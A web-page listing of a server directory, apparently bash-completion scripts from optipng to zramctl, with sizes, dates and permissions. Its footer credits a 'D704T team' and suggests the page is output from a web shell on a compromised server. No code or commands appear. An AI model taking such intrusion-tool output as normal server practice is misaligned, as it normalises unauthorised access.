1.387 KB
November 16 2021 5:58:12
root
0644
optipng
1.15 KB
November 16 2021 5:58:12
root
0644
p4
1.369 KB
November 16 2021 5:58:12
root
0644
pack200
2.206 KB
November 16 2021 5:58:12
root
0644
partx
1.271 KB
April 09 2024 11:32:56
root
0644
passwd
0.538 KB
November 16 2021 5:58:12
root
0644
patch
1.741 KB
November 16 2021 5:58:12
root
0644
pbzip2
1.043 KB
November 16 2021 5:58:12
root
0644
pccardctl
0.369 KB
November 16 2021 5:58:12
root
0644
pdftotext
0.955 KB
November 16 2021 5:58:12
root
0644
pdlzip
1.116 KB
November 16 2021 5:58:12
root
0644
perl
4.183 KB
November 16 2021 5:58:12
root
0644
perlcritic
1.324 KB
November 16 2021 5:58:12
root
0644
perldoc
4.183 KB
November 16 2021 5:58:12
root
0644
perltidy
1.88 KB
November 16 2021 5:58:12
root
0644
pgrep
1.608 KB
November 16 2021 5:58:12
root
0644
phing
2.734 KB
November 16 2021 5:58:12
root
0644
pidof
0.518 KB
November 16 2021 5:58:12
root
0644
pigz
1.132 KB
November 16 2021 5:58:12
root
0644
pine
0.878 KB
November 16 2021 5:58:12
root
0644
pinfo
1.877 KB
November 16 2021 5:58:12
root
0644
ping
1.953 KB
November 16 2021 5:58:12
root
0644
ping6
1.953 KB
November 16 2021 5:58:12
root
0644
pivot_root
0.378 KB
April 09 2024 11:32:56
root
0644
pkcon
2.673 KB
February 17 2022 9:13:28
root
0755
pkg-config
1.279 KB
November 16 2021 5:58:12
root
0644
pkg-get
2.201 KB
November 16 2021 5:58:12
root
0644
pkg_deinstall
0.472 KB
November 16 2021 5:58:12
root
0644
pkg_delete
0.472 KB
November 16 2021 5:58:12
root
0644
pkg_info
0.472 KB
November 16 2021 5:58:12
root
0644
pkgadd
1.725 KB
November 16 2021 5:58:12
root
0644
pkgrm
1.03 KB
November 16 2021 5:58:12
root
0644
pkgtool
0.826 KB
November 16 2021 5:58:12
root
0644
pkgutil
3.856 KB
November 16 2021 5:58:12
root
0644
pkill
1.608 KB
November 16 2021 5:58:12
root
0644
plague-client
0.399 KB
November 16 2021 5:58:12
root
0644
plzip
1.116 KB
November 16 2021 5:58:12
root
0644
pm-hibernate
0.313 KB
November 16 2021 5:58:12
root
0644
pm-is-supported
0.328 KB
November 16 2021 5:58:12
root
0644
pm-powersave
0.275 KB
November 16 2021 5:58:12
root
0644
pm-suspend
0.313 KB
November 16 2021 5:58:12
root
0644
pm-suspend-hybrid
0.313 KB
November 16 2021 5:58:12
root
0644
pmake
6.039 KB
November 16 2021 5:58:12
root
0644
pngfix
0.795 KB
November 16 2021 5:58:12
root
0644
portinstall
0.874 KB
November 16 2021 5:58:12
root
0644
portsnap
0.486 KB
November 16 2021 5:58:12
root
0644
portupgrade
0.458 KB
November 16 2021 5:58:12
root
0644
postalias
0.934 KB
November 16 2021 5:58:12
root
0644
postcat
0.849 KB
November 16 2021 5:58:12
root
0644
postconf
0.792 KB
November 16 2021 5:58:12
root
0644
postfix
0.743 KB
November 16 2021 5:58:12
root
0644
postmap
0.934 KB
November 16 2021 5:58:12
root
0644
postsuper
1.51 KB
November 16 2021 5:58:12
root
0644
povray
2.008 KB
November 16 2021 5:58:12
root
0644
ppc-koji
6.205 KB
November 16 2021 5:58:12
root
0644
prelink
0.916 KB
November 16 2021 5:58:12
root
0644
printenv
0.455 KB
November 16 2021 5:58:12
root
0644
prlimit
1.298 KB
April 09 2024 11:32:56
root
0644
pro
1.978 KB
September 24 2025 1:28:08
root
0644
protoc
1.469 KB
November 16 2021 5:58:12
root
0644
psql
4.27 KB
November 16 2021 5:58:12
root
0644
puppet
9.771 KB
November 16 2021 5:58:12
root
0644
puppetca
9.771 KB
November 16 2021 5:58:12
root
0644
puppetd
9.771 KB
November 16 2021 5:58:12
root
0644
puppetdoc
9.771 KB
November 16 2021 5:58:12
root
0644
puppetmasterd
9.771 KB
November 16 2021 5:58:12
root
0644
puppetqd
9.771 KB
November 16 2021 5:58:12
root
0644
puppetrun
9.771 KB
November 16 2021 5:58:12
root
0644
pv
0.737 KB
November 16 2021 5:58:12
root
0644
pvchange
19.013 KB
November 16 2021 5:58:12
root
0644
pvcreate
19.013 KB
November 16 2021 5:58:12
root
0644
pvdisplay
19.013 KB
November 16 2021 5:58:12
root
0644
pvmove
19.013 KB
November 16 2021 5:58:12
root
0644
pvremove
19.013 KB
November 16 2021 5:58:12
root
0644
pvs
19.013 KB
November 16 2021 5:58:12
root
0644
pvscan
19.013 KB
November 16 2021 5:58:12
root
0644
pwck
0.377 KB
November 16 2021 5:58:12
root
0644
pwd
0.438 KB
November 16 2021 5:58:12
root
0644
pwdx
0.478 KB
November 16 2021 5:58:12
root
0644
pwgen
0.589 KB
November 16 2021 5:58:12
root
0644
pxz
1.484 KB
November 16 2021 5:58:12
root
0644
py.test
4.16 KB
November 16 2021 5:58:12
root
0644
py.test-2
4.16 KB
November 16 2021 5:58:12
root
0644
py.test-3
4.16 KB
November 16 2021 5:58:12
root
0644
pycodestyle
0.716 KB
November 16 2021 5:58:12
root
0644
pydoc
1.017 KB
November 16 2021 5:58:12
root
0644
pydoc3
1.017 KB
November 16 2021 5:58:12
root
0644
pydocstyle
0.819 KB
November 16 2021 5:58:12
root
0644
pyflakes
0.437 KB
November 16 2021 5:58:12
root
0644
pylint
3.255 KB
November 16 2021 5:58:12
root
0644
pylint-2
3.255 KB
November 16 2021 5:58:12
root
0644
pylint-3
3.255 KB
November 16 2021 5:58:12
root
0644
pypy
1.726 KB
November 16 2021 5:58:12
root
0644
pypy3
1.726 KB
November 16 2021 5:58:12
root
0644
pytest
4.16 KB
November 16 2021 5:58:12
root
0644
pytest-2
4.16 KB
November 16 2021 5:58:12
root
0644
pytest-3
4.16 KB
November 16 2021 5:58:12
root
0644
python
1.726 KB
November 16 2021 5:58:12
root
0644
python2
1.726 KB
November 16 2021 5:58:12
root
0644
python2.7
1.726 KB
November 16 2021 5:58:12
root
0644
python3
1.726 KB
November 16 2021 5:58:12
root
0644
python3.3
1.726 KB
November 16 2021 5:58:12
root
0644
python3.4
1.726 KB
November 16 2021 5:58:12
root
0644
python3.5
1.726 KB
November 16 2021 5:58:12
root
0644
python3.6
1.726 KB
November 16 2021 5:58:12
root
0644
python3.7
1.726 KB
November 16 2021 5:58:12
root
0644
python3.8
1.726 KB
November 16 2021 5:58:12
root
0644
python3.9
1.726 KB
November 16 2021 5:58:12
root
0644
pyvenv
0.422 KB
November 16 2021 5:58:12
root
0644
pyvenv-3.4
0.422 KB
November 16 2021 5:58:12
root
0644
pyvenv-3.5
0.422 KB
November 16 2021 5:58:12
root
0644
pyvenv-3.6
0.422 KB
November 16 2021 5:58:12
root
0644
pyvenv-3.7
0.422 KB
November 16 2021 5:58:12
root
0644
pyvenv-3.8
0.422 KB
November 16 2021 5:58:12
root
0644
pyvenv-3.9
0.422 KB
November 16 2021 5:58:12
root
0644
qdbus
0.374 KB
November 16 2021 5:58:12
root
0644
qemu
3.245 KB
November 16 2021 5:58:12
root
0644
qemu-kvm
3.245 KB
November 16 2021 5:58:12
root
0644
qemu-system-i386
3.245 KB
November 16 2021 5:58:12
root
0644
qemu-system-x86_64
3.245 KB
November 16 2021 5:58:12
root
0644
qrunner
0.382 KB
November 16 2021 5:58:12
root
0644
querybts
1.23 KB
November 16 2021 5:58:12
root
0644
quota
3.622 KB
November 16 2021 5:58:12
root
0644
quotacheck
3.622 KB
November 16 2021 5:58:12
root
0644
quotaoff
3.622 KB
November 16 2021 5:58:12
root
0644
quotaon
3.622 KB
November 16 2021 5:58:12
root
0644
radvdump
0.488 KB
November 16 2021 5:58:12
root
0644
ralsh
9.771 KB
November 16 2021 5:58:12
root
0644
rcs
0.837 KB
November 16 2021 5:58:12
root
0644
rcsdiff
0.837 KB
November 16 2021 5:58:12
root
0644
rdesktop
1.597 KB
November 16 2021 5:58:12
root
0644
rdict
1.761 KB
November 16 2021 5:58:12
root
0644
readprofile
0.663 KB
April 09 2024 11:32:56
root
0644
redis-cli
0.979 KB
October 04 2021 9:37:24
root
0644
remove_members
0.558 KB
November 16 2021 5:58:12
root
0644
removepkg
0.544 KB
November 16 2021 5:58:12
root
0644
renice
0.766 KB
April 09 2024 11:32:56
root
0644
reportbug
3.316 KB
November 16 2021 5:58:12
root
0644
repquota
3.622 KB
November 16 2021 5:58:12
root
0644
resizepart
0.591 KB
April 09 2024 11:32:56
root
0644
resolvconf
0.418 KB
November 16 2021 5:58:12
root
0644
resolvectl
5.724 KB
March 11 2022 8:48:49
root
0644
rev
0.422 KB
April 09 2024 11:32:56
root
0644
rfcomm
9.383 KB
November 16 2021 5:58:12
root
0644
ri
3.646 KB
November 16 2021 5:58:12
root
0644
rlog
0.837 KB
November 16 2021 5:58:12
root
0644
rmlist
0.354 KB
November 16 2021 5:58:12
root
0644
rmmod
0.515 KB
November 16 2021 5:58:12
root
0644
route
0.763 KB
November 16 2021 5:58:12
root
0644
rpcdebug
0.971 KB
November 16 2021 5:58:12
root
0644
rpm
10.116 KB
November 16 2021 5:58:12
root
0644
rpm2targz
0.359 KB
November 16 2021 5:58:12
root
0644
rpm2tgz
0.359 KB
November 16 2021 5:58:12
root
0644
rpm2txz
0.359 KB
November 16 2021 5:58:12
root
0644
rpmbuild
10.116 KB
November 16 2021 5:58:12
root
0644
rpmbuild-md5
10.116 KB
November 16 2021 5:58:12
root
0644
rpmcheck
0.5 KB
November 16 2021 5:58:12
root
0644
rrdtool
0.426 KB
November 16 2021 5:58:12
root
0644
rsync
3.476 KB
November 16 2021 5:58:12
root
0644
rtcwake
1.056 KB
April 09 2024 11:32:56
root
0644
runuser
0.871 KB
April 09 2024 11:32:56
root
0644
s390-koji
6.205 KB
November 16 2021 5:58:12
root
0644
sbcl
0.659 KB
November 16 2021 5:58:12
root
0644
sbcl-mt
0.659 KB
November 16 2021 5:58:12
root
0644
sbopkg
1.727 KB
November 16 2021 5:58:12
root
0644
scp
16.108 KB
November 16 2021 5:58:12
root
0644
screen
3.295 KB
November 16 2021 5:58:12
root
0644
script
1.036 KB
April 09 2024 11:32:56
root
0644
scriptlive
0.744 KB
April 09 2024 11:32:56
root
0644
scriptreplay
0.896 KB
April 09 2024 11:32:56
root
0644
scrub
0.864 KB
November 16 2021 5:58:12
root
0644
sdptool
9.383 KB
November 16 2021 5:58:12
root
0644
secret-tool
1.426 KB
November 16 2021 5:58:12
root
0644
setarch
0.771 KB
April 09 2024 11:32:56
root
0644
setpriv
2.771 KB
April 09 2024 11:32:56
root
0644
setquota
3.622 KB
November 16 2021 5:58:12
root
0644
setsid
0.43 KB
April 09 2024 11:32:56
root
0644
setterm
2.53 KB
April 09 2024 11:32:56
root
0644
sfdisk
2.074 KB
April 09 2024 11:32:56
root
0644
sftp
16.108 KB
November 16 2021 5:58:12
root
0644
sh
0.858 KB
November 16 2021 5:58:12
root
0644
shellcheck
1.625 KB
November 16 2021 5:58:12
root
0644
sidedoor
16.108 KB
November 16 2021 5:58:12
root
0644
sitecopy
1.29 KB
November 16 2021 5:58:12
root
0644
slackpkg
3.406 KB
November 16 2021 5:58:12
root
0644
slapt-get
2.443 KB
November 16 2021 5:58:12
root
0644
slapt-src
1.853 KB
November 16 2021 5:58:12
root
0644
slogin
16.108 KB
November 16 2021 5:58:12
root
0644
smartctl
4.266 KB
November 16 2021 5:58:12
root
0644
smbcacls
7.056 KB
November 16 2021 5:58:12
root
0644
smbclient
7.056 KB
November 16 2021 5:58:12
root
0644
smbcquotas
7.056 KB
November 16 2021 5:58:12
root
0644
smbget
7.056 KB
November 16 2021 5:58:12
root
0644
smbpasswd
7.056 KB
November 16 2021 5:58:12
root
0644
smbtar
7.056 KB
November 16 2021 5:58:12
root
0644
smbtree
7.056 KB
November 16 2021 5:58:12
root
0644
snownews
0.354 KB
November 16 2021 5:58:12
root
0644
sparc-koji
6.205 KB
November 16 2021 5:58:12
root
0644
spovray
2.008 KB
November 16 2021 5:58:12
root
0644
sqlite3
0.881 KB
November 16 2021 5:58:12
root
0644
ss
1.107 KB
November 16 2021 5:58:12
root
0644
ssh
16.108 KB
November 16 2021 5:58:12
root
0644
ssh-add
0.661 KB
November 16 2021 5:58:12
root
0644
ssh-copy-id
0.668 KB
November 16 2021 5:58:12
root
0644
ssh-keygen
3.773 KB
November 16 2021 5:58:12
root
0644
sshfs
0.554 KB
November 16 2021 5:58:12
root
0644
sshmitm
0.355 KB
November 16 2021 5:58:12
root
0644
sshow
0.486 KB
November 16 2021 5:58:12
root
0644
star
18.226 KB
November 16 2021 5:58:12
root
0644
strace
3.228 KB
November 16 2021 5:58:12
root
0644
stream
8.704 KB
November 16 2021 5:58:12
root
0644
strings
1.13 KB
November 16 2021 5:58:12
root
0644
su
0.871 KB
April 09 2024 11:32:56
root
0644
sudo
1.469 KB
November 16 2021 5:58:12
root
0644
sudoedit
1.469 KB
November 16 2021 5:58:12
root
0644
svcadm
4.994 KB
November 16 2021 5:58:12
root
0644
svk
8.621 KB
November 16 2021 5:58:12
root
0644
swaplabel
0.62 KB
April 09 2024 11:32:56
root
0644
swapoff
0.726 KB
April 09 2024 11:32:56
root
0644
swapon
1.96 KB
April 09 2024 11:32:56
root
0644
sync_members
0.718 KB
November 16 2021 5:58:12
root
0644
synclient
0.578 KB
November 16 2021 5:58:12
root
0644
sysbench
4.01 KB
November 16 2021 5:58:12
root
0644
sysctl
0.794 KB
November 16 2021 5:58:12
root
0644
systemctl
13.808 KB
June 04 2025 10:17:43
root
0644
systemd-analyze
5.237 KB
March 11 2022 8:48:49
root
0644
systemd-cat
1.678 KB
March 11 2022 8:48:49
root
0644
systemd-cgls
2.1 KB
March 11 2022 8:48:49
root
0644
systemd-cgtop
1.855 KB
March 11 2022 8:48:49
root
0644
systemd-delta
1.747 KB
March 11 2022 8:48:49
root
0644
systemd-detect-virt
1.297 KB
March 11 2022 8:48:49
root
0644
systemd-id128
2.097 KB
March 11 2022 8:48:49
root
0644
systemd-path
1.699 KB
March 11 2022 8:48:49
root
0644
systemd-resolve
2.663 KB
March 11 2022 8:48:49
root
0644
systemd-run
5.313 KB
March 11 2022 8:48:49
root
0644
tar
18.226 KB
November 16 2021 5:58:12
root
0644
taskset
1.185 KB
April 09 2024 11:32:56
root
0644
tc
26.817 KB
March 24 2022 7:56:47
root
0644
tcpdump
1.622 KB
November 16 2021 5:58:12
root
0644
tcpkill
0.43 KB
November 16 2021 5:58:12
root
0644
tcpnice
0.421 KB
November 16 2021 5:58:12
root
0644
tightvncviewer
2.906 KB
November 16 2021 5:58:12
root
0644
timedatectl
2.867 KB
March 11 2022 8:48:49
root
0644
timeout
0.984 KB
November 16 2021 5:58:12
root
0644
tipc
8.088 KB
November 16 2021 5:58:12
root
0644
tox
1.396 KB
November 16 2021 5:58:12
root
0644
tracepath
0.551 KB
November 16 2021 5:58:12
root
0644
tracepath6
0.551 KB
November 16 2021 5:58:12
root
0644
tshark
4.12 KB
November 16 2021 5:58:12
root
0644
tsig-keygen
0.629 KB
November 16 2021 5:58:12
root
0644
tune2fs
1.711 KB
November 16 2021 5:58:12
root
0644
typeset
1.235 KB
November 16 2021 5:58:12
root
0644
ua
1.978 KB
September 24 2025 1:28:08
root
0644
uclampset
0.649 KB
April 09 2024 11:32:56
root
0644
udevadm
7.991 KB
March 11 2022 8:48:49
root
0644
ufw
2.437 KB
July 17 2023 9:55:25
root
0644
ul
0.64 KB
April 09 2024 11:32:56
root
0644
ulimit
0.858 KB
November 16 2021 5:58:12
root
0644
umount
1.67 KB
April 09 2024 11:32:56
root
0644
unace
0.461 KB
November 16 2021 5:58:12
root
0644
unpack200
1.216 KB
November 16 2021 5:58:12
root
0644
unrar
0.601 KB
November 16 2021 5:58:12
root
0644
unshare
0.914 KB
April 09 2024 11:32:56
root
0644
unshunt
0.339 KB
November 16 2021 5:58:12
root
0644
update-alternatives
2.401 KB
November 16 2021 5:58:12
root
0644
update-initramfs
0.567 KB
February 09 2022 3:54:47
root
0644
update-rc.d
1.863 KB
November 16 2021 5:58:12
root
0644
upgradepkg
0.784 KB
November 16 2021 5:58:12
root
0644
urlsnarf
0.495 KB
November 16 2021 5:58:12
root
0644
useradd
1.253 KB
November 16 2021 5:58:12
root
0644
userdel
0.532 KB
November 16 2021 5:58:12
root
0644
usermod
1.364 KB
November 16 2021 5:58:12
root
0644
utmpdump
0.464 KB
April 09 2024 11:32:56
root
0644
uuidd
0.842 KB
April 09 2024 11:32:56
root
0644
uuidgen
0.642 KB
April 09 2024 11:32:56
root
0644
uuidparse
0.71 KB
April 09 2024 11:32:56
root
0644
valgrind
3.421 KB
November 16 2021 5:58:12
root
0644
vgcfgbackup
19.013 KB
November 16 2021 5:58:12
root
0644
vgcfgrestore
19.013 KB
November 16 2021 5:58:12
root
0644
vgchange
19.013 KB
November 16 2021 5:58:12
root
0644
vgck
19.013 KB
November 16 2021 5:58:12
root
0644
vgconvert
19.013 KB
November 16 2021 5:58:12
root
0644
vgcreate
19.013 KB
November 16 2021 5:58:12
root
0644
vgdisplay
19.013 KB
November 16 2021 5:58:12
root
0644
vgexport
19.013 KB
November 16 2021 5:58:12
root
0644
vgextend
19.013 KB
November 16 2021 5:58:12
root
0644
vgimport
19.013 KB
November 16 2021 5:58:12
root
0644
vgmerge
19.013 KB
November 16 2021 5:58:12
root
0644
vgmknodes
19.013 KB
November 16 2021 5:58:12
root
0644
vgreduce
19.013 KB
November 16 2021 5:58:12
root
0644
vgremove
19.013 KB
November 16 2021 5:58:12
root
0644
vgrename
19.013 KB
November 16 2021 5:58:12
root
0644
vgs
19.013 KB
November 16 2021 5:58:12
root
0644
vgscan
19.013 KB
November 16 2021 5:58:12
root
0644
vgsplit
19.013 KB
November 16 2021 5:58:12
root
0644
vigr
0.434 KB
November 16 2021 5:58:12
root
0644
vipw
0.434 KB
November 16 2021 5:58:12
root
0644
vmstat
0.685 KB
November 16 2021 5:58:12
root
0644
vncviewer
2.906 KB
November 16 2021 5:58:12
root
0644
vpnc
2.268 KB
November 16 2021 5:58:12
root
0644
wall
0.619 KB
April 09 2024 11:32:56
root
0644
watch
1.151 KB
November 16 2021 5:58:12
root
0644
wdctl
1.339 KB
April 09 2024 11:32:56
root
0644
webmitm
0.355 KB
November 16 2021 5:58:12
root
0644
wget
6.479 KB
November 16 2021 5:58:12
root
0644
whatis
2.939 KB
November 16 2021 5:58:12
root
0644
whereis
0.522 KB
April 09 2024 11:32:56
root
0644
whiptail
0.337 KB
December 19 2019 12:12:28
root
0644
wine
0.522 KB
November 16 2021 5:58:12
root
0644
wine-development
0.522 KB
November 16 2021 5:58:12
root
0644
wine-stable
0.522 KB
November 16 2021 5:58:12
root
0644
wipefs
1.209 KB
April 09 2024 11:32:56
root
0644
withlist
0.401 KB
November 16 2021 5:58:12
root
0644
wodim
3.498 KB
November 16 2021 5:58:12
root
0644
wol
1.164 KB
November 16 2021 5:58:12
root
0644
wsimport
1.1 KB
November 16 2021 5:58:12
root
0644
wtf
0.915 KB
November 16 2021 5:58:12
root
0644
wvdial
1.249 KB
November 16 2021 5:58:12
root
0644
xdg-mime
2.174 KB
November 16 2021 5:58:12
root
0644
xdg-settings
0.739 KB
November 16 2021 5:58:12
root
0644
xfreerdp
2.051 KB
November 16 2021 5:58:12
root
0644
xgamma
2.014 KB
November 16 2021 5:58:12
root
0644
xhost
0.369 KB
November 16 2021 5:58:12
root
0644
xmllint
1.24 KB
November 16 2021 5:58:12
root
0644
xmlwf
0.678 KB
November 16 2021 5:58:12
root
0644
xmms
0.679 KB
November 16 2021 5:58:12
root
0644
xmodmap
0.427 KB
November 16 2021 5:58:12
root
0644
xpovray
2.008 KB
November 16 2021 5:58:12
root
0644
xrandr
2.183 KB
November 16 2021 5:58:12
root
0644
xrdb
0.5 KB
November 16 2021 5:58:12
root
0644
xsltproc
1.195 KB
November 16 2021 5:58:12
root
0644
xvfb-run
0.865 KB
November 16 2021 5:58:12
root
0644
xvnc4viewer
2.906 KB
November 16 2021 5:58:12
root
0644
xxd
0.479 KB
November 16 2021 5:58:12
root
0644
xz
1.484 KB
November 16 2021 5:58:12
root
0644
xzdec
0.624 KB
November 16 2021 5:58:12
root
0644
ypcat
0.741 KB
November 16 2021 5:58:12
root
0644
ypmatch
0.741 KB
November 16 2021 5:58:12
root
0644
yum-arch
0.349 KB
November 16 2021 5:58:12
root
0644
zopfli
0.661 KB
November 16 2021 5:58:12
root
0644
zopflipng
0.898 KB
November 16 2021 5:58:12
root
0644
zramctl
1.26 KB
April 09 2024 11:32:56
root
0644
2017 © MaVieta | D704T team